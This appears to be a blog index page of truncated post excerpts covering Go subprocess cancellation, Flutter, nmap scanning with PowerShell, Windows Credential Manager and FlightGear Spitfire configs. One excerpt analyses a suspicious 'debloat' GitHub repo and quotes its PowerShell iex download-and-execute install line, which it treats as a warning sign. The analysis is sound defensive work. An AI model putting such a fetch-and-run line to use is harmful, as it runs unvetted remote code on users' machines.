Nonlinearsound

Description

This example program creates a context using the context.WithCancel() method from the context package.

WithCancel creates the context while returning a cancel function that can be called to prematurely cancel/end the context.

exec.CommandContext(ctx, ".\\test.exe", "e") is exec.Command() but with creating a context around the creation and execution of the sub process. Using that context, the execution of the sub process can now be ended prematurely.

The text.exe is another compiled and linked Go program, that just loops forever, printing "ENDLESS.." to the console. As the example program calls cmd.Wait() it waits for the sub process to end, either by it ending by itself od because of being killed by another system process.

Nonlinearsound

import 'dart:async';
import 'dart:convert';

import 'package:flutter/material.dart' hide MenuItem;
import 'package:http/http.dart' as http;

void main() async {
  runApp(const MyApp());
}

Nonlinearsound

If you're gathering IP and MAC addresses using nmap on a Windows machine, you can use Powershell to replace awk to transform the output to a comma seperated file, containing the IP and MAC address.

nmap -sP -n -oX scan.xml 192.168.1.0/24 

This call produces an XML file, contining the scanned hosts as XML nodes containing subnodes with address information. The address nodes will be the IP address and the MAC address.

<host>
	<status reason="arp-response" reason_ttl="0" state="up"/>

Nonlinearsound

The goal

The public repo https://github.com/windowtoolbox/under_observation (the original name was changed by github as the repo is now under observation and all repo files are unaccessible) looked like providing a Powershell script that will optimize and debloat your Windows installation. Strange enough the actual script was not included in the repo as a file but just as a download link in the readme file of the repo. It was all quite suspicious. The installation instruction was the typical iex instruction like this:

iex((New-Object System.Net.WebClient).DownloadString('https://link-to-the-scriptfile'))

Downloading the script by hand gives us a Powershell script with a lot of instructions that actually do what the script pretended to do, they change a lot of system parameters for optimization and de-install software for debloating Windows.

But beside that code there are two blocks of obfuscated code that looked suspicious - well they are obfuscated so you wouldn't expect them to contain

Nonlinearsound

Storing and retreiving Windows Credential Manager info in C# and Go

Lately I had the need for storing SMTP credentials somewhere on the system to be used for a small Go application that would automatically send mails to administrators in case, a certain ETW event would have fired. The solution on Windows is to use the windows Credential Manager. On Linux you could use pass.

I needed both solutions for Go and C#.

Go

In Go it's pretty simple as Daniel Joos already wrote a nice package for exactly that purpose. You can get it here:

Nonlinearsound

<?xml version="1.0" encoding="UTF-8"?>

<PropertyList> 

  <fx> 

    <crank> 
      <name>engstart</name>
      <path>Aircraft/SpitfireVb_VooDoo/Sounds/merlin-start.wav</path>
	  <condition>

Nonlinearsound

<?xml version="1.0"?>
<!--
************************************************************************
Spitfire Vb configuration
************************************************************************
-->

<PropertyList>

 <sim>